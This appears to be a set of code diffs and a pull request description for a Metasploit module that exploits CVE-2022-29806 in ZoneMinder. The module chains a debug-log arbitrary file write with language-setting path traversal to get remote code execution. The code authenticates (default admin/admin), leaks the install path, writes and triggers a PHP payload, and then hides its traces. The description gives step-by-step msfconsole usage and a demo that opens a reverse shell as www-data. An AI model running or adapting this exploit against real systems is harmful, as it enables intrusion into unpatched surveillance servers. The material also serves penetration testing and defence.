+        'method' => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
+
+      username = datastore['USERNAME']
+      password = datastore['PASSWORD']
+      if res.body =~ /ZoneMinder Login/
+        data = "action=login&view=login&username=#{username}&password=#{password}"
+        csrf_magic = get_csrf_magic(res.body)
+        data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, '/index.php'),
+          'data' => data.to_s
+        })
+        if res.body =~ %r{<title>ZM - Login</title>}
+          vprint_error('Service found, but authentication failed')
+          return Exploit::CheckCode::Detected
+        else
+          res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
+          @cookie = Regexp.last_match(1)
+          res = send_request_cgi(
+            'uri' => normalize_uri(target_uri.path, '/index.php'),
+            'method' => 'GET',
+            'cookie' => @cookie
+          )
+        end
+      end
+
+      res.body.match(/v(1.\d+.\d+)/)
+      version = Regexp.last_match(1)
+
+      if version && Rex::Version.new(version) <= Rex::Version.new('1.37.10')
+        @appears = Exploit::CheckCode::Appears
+        vprint_good("Version Detected: #{version}")
+        return @appears
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    vprint_bad("Version Detected: #{version}")
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @appears ||= check
+    unless Exploit::CheckCode::Appears == @appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    begin
+      vprint_status('Leak installation directory path')
+      random_path = rand_text_alphanumeric(rand(6..15))
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'GET',
+        'cookie' => @cookie,
+        'vars_get' => { 'view' => random_path }
+      )
+
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'GET',
+        'cookie' => @cookie
+      )
+      csrf_magic = get_csrf_magic(res.body)
+
+      data = 'view=request&request=log&task=query&limit=10'
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_s,
+        'cookie' => @cookie
+      )
+
+      res.body.match(/(\{"result":.*})/)
+      request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
+      if request_log.key?(:rows) # Check for latest version key first v1.36.x
+        request_log_key = 'rows'
+      elsif request_log.key?(:logs)
+        request_log_key = 'logs'
+      else
+        vprint_error("Service found, but can't find request log key")
+        return Exploit::CheckCode::Detected
+      end
+
+      request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first
+      if request_log
+        path = request_log['File'].split('/')[0..-2].join('/')
+        vprint_good("Path: #{path}")
+      else
+        vprint_error("Service found, but can't leak installation directory path")
+        return Exploit::CheckCode::Detected
+      end
+
+      fname = "#{rand_text_alphanumeric(rand(6..15))}.php"
+      traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join
+      shell = traverse_path + "tmp/#{fname}"
+      data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_s,
+        'cookie' => @cookie
+      )
+      vprint_good("Shell: #{shell}")
+
+      p = %(<?php #{payload.encoded} ?>)
+      data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_s,
+        'cookie' => @cookie
+      )
+
+      # trigger the shell
+      lang = shell.gsub(/\.php/, '')
+      data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_s,
+        'cookie' => @cookie
+      )
+
+      # cleanup
+      data = Rack::Utils.parse_nested_query(data)
+      data['newConfig']['ZM_LANG_DEFAULT'] = 'en_gb'
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_query,
+        'cookie' => @cookie
+      )
+      data['tab'] = 'logging'
+      data['newConfig']['ZM_LOG_DEBUG'] = 0
+      data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_query,
+        'cookie' => @cookie
+      )
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  private
+
+  def get_csrf_magic(html_body)
+    html_body.match(/csrfMagicToken = "([^"]+)/)
+    Regexp.last_match(1)
+  end
+end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -95,10 +95,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless Exploit::CheckCode::Appears == check
-      fail_with(Failure::Unknown, check.reason) if check.code == 'unknown'
-      fail_with(Failure::NoAccess, check.reason) if check.code == 'detected'
-      fail_with(Failure::NotVulnerable, check.reason)
+    @check ||= check
+    unless Exploit::CheckCode::Appears == @check
+      fail_with(Failure::Unknown, @check.reason) if @check.code == 'unknown'
+      fail_with(Failure::NoAccess, @check.reason) if @check.code == 'detected'
+      fail_with(Failure::NotVulnerable, @check.reason)
     end
 
     begin

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'view' => 'options' }
     )
     csrf_magic = get_csrf_magic(res)
-    current_lang = res.get_html_document.at(
+    current_lang = res&.get_html_document&.at(
       'select[@name="newConfig[ZM_LANG_DEFAULT]"]
         option[@selected="selected"]'
     )&.text

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -114,9 +114,14 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi(
         'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'GET',
-        'cookie' => @cookie
+        'cookie' => @cookie,
+        'vars_get' => { 'view' => 'options' }
       )
       csrf_magic = get_csrf_magic(res.body)
+      current_lang = res.get_html_document.at(
+        'select[@name="newConfig[ZM_LANG_DEFAULT]"]
+        option[@selected="selected"]'
+      ).text
 
       data = 'view=request&request=log&task=query&limit=10'
       data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
@@ -181,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # cleanup
       data = Rack::Utils.parse_nested_query(data)
-      data['newConfig']['ZM_LANG_DEFAULT'] = 'en_gb'
+      data['newConfig']['ZM_LANG_DEFAULT'] = current_lang
       send_request_cgi(
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, '/index.php'),

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -101,106 +101,106 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, @check.reason)
     end
 
-      vprint_status('Leak installation directory path')
-      random_path = rand_text_alphanumeric(6..15)
-      send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'method' => 'GET',
-        'cookie' => @cookie,
-        'vars_get' => { 'view' => random_path }
-      )
+    vprint_status('Leak installation directory path')
+    random_path = rand_text_alphanumeric(6..15)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'vars_get' => { 'view' => random_path }
+    )
 
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'method' => 'GET',
-        'cookie' => @cookie,
-        'vars_get' => { 'view' => 'options' }
-      )
-      csrf_magic = get_csrf_magic(res.body)
-      current_lang = res.get_html_document.at(
-        'select[@name="newConfig[ZM_LANG_DEFAULT]"]
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'vars_get' => { 'view' => 'options' }
+    )
+    csrf_magic = get_csrf_magic(res.body)
+    current_lang = res.get_html_document.at(
+      'select[@name="newConfig[ZM_LANG_DEFAULT]"]
         option[@selected="selected"]'
-      ).text
+    ).text
 
-      data = 'view=request&request=log&task=query&limit=10'
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_s,
-        'cookie' => @cookie
-      )
+    data = 'view=request&request=log&task=query&limit=10'
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'cookie' => @cookie
+    )
 
-      res.body.match(/(\{"result":.*})/)
-      request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
-      if request_log.key?(:rows) # Check for latest version key first v1.36.x
-        request_log_key = 'rows'
-      elsif request_log.key?(:logs)
-        request_log_key = 'logs'
-      else
-        fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')
-      end
+    res.body.match(/(\{"result":.*})/)
+    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
+    if request_log.key?(:rows) # Check for latest version key first v1.36.x
+      request_log_key = 'rows'
+    elsif request_log.key?(:logs)
+      request_log_key = 'logs'
+    else
+      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')
+    end
 
-      request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first
-      if request_log
-        path = request_log['File'].split('/')[0..-2].join('/')
-        vprint_good("Path: #{path}")
-      else
-        fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')
-      end
+    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first
+    if request_log
+      path = request_log['File'].split('/')[0..-2].join('/')
+      vprint_good("Path: #{path}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')
+    end
 
-      fname = "#{rand_text_alphanumeric(6..15)}.php"
-      traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join
-      shell = traverse_path + "tmp/#{fname}"
-      data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_s,
-        'cookie' => @cookie
-      )
-      vprint_good("Shell: #{shell}")
+    fname = "#{rand_text_alphanumeric(6..15)}.php"
+    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join
+    shell = traverse_path + "tmp/#{fname}"
+    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'cookie' => @cookie
+    )
+    vprint_good("Shell: #{shell}")
 
-      p = %(<?php #{payload.encoded} ?>)
-      data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_s,
-        'cookie' => @cookie
-      )
+    p = %(<?php #{payload.encoded} ?>)
+    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'cookie' => @cookie
+    )
 
-      # trigger the shell
-      lang = shell.gsub(/\.php/, '')
-      data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_s,
-        'cookie' => @cookie
-      )
+    # trigger the shell
+    lang = shell.gsub(/\.php/, '')
+    data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'cookie' => @cookie
+    )
 
-      # cleanup
-      data = Rack::Utils.parse_nested_query(data)
-      data['newConfig']['ZM_LANG_DEFAULT'] = current_lang
-      send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_query,
-        'cookie' => @cookie
-      )
-      data['tab'] = 'logging'
-      data['newConfig']['ZM_LOG_DEBUG'] = 0
-      data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''
-      send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_query,
-        'cookie' => @cookie
-      )
+    # cleanup
+    data = Rack::Utils.parse_nested_query(data)
+    data['newConfig']['ZM_LANG_DEFAULT'] = current_lang
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_query,
+      'cookie' => @cookie
+    )
+    data['tab'] = 'logging'
+    data['newConfig']['ZM_LOG_DEBUG'] = 0
+    data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_query,
+      'cookie' => @cookie
+    )
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -121,6 +121,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
+    unless res['content-type'] == 'application/json'
+      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
+    end
     res.body.match(/(\{"result":.*})/)
     request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
     if request_log.key?(:rows) # Check for latest version key first v1.36.x

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -46,7 +46,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(80),
       OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
       OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
       OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
@@ -102,7 +101,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, @check.reason)
     end
 
-    begin
       vprint_status('Leak installation directory path')
       random_path = rand_text_alphanumeric(6..15)
       send_request_cgi(
@@ -203,9 +201,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'data' => data.to_query,
         'cookie' => @cookie
       )
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
   private

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       vprint_status('Leak installation directory path')
-      random_path = rand_text_alphanumeric(rand(6..15))
+      random_path = rand_text_alphanumeric(6..15)
       send_request_cgi(
         'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'GET',


### PR DESCRIPTION
This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11.

More vulnerability details and references: [CVE-2022-29806](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29806)

## Meterpreter
Upon successful exploitation the module will change the language back to `en_gb` to prevent a PHP warning shows in the dashboard like this:
```
View: request Request: log Action: User: admin] at /usr/share/zoneminder/www/index.php line 235 04/28/22 15:03:50.516723 web_js[550].ERR [172.17.0.1] [
Warning: Use of undefined constant [snip-base64-long-string-payload] - assumed '[snip-base64-string-payload] in /tmp/8NMNy9sqV.php on line 10
```
The warning is a lot and will be notice by users using the dashboard so it's good to change it back to its default. However, using `php/meterpreter_reverse_tcp` will even made the dashboard stop working, it's like the part of the code that suppose to change the language back is not executing when using meterpreter. The module will configured `php/reverse_perl` as the default payload for good reliability.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/zoneminder_lang_exec`
- [ ] `set RHOSTS [ips]`
- [ ] `set LHOST [lhost]`
- [ ] `set VERBOSE true`
- [ ] `run`
- [ ] **Verify** the module should get a shell.

## Demo
ZoneMinder 1.36.4 on Linux (Ubuntu 18.04 Docker Image)
```
msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/n4Ibantd.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36390) at 2022-04-28 21:39:56 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
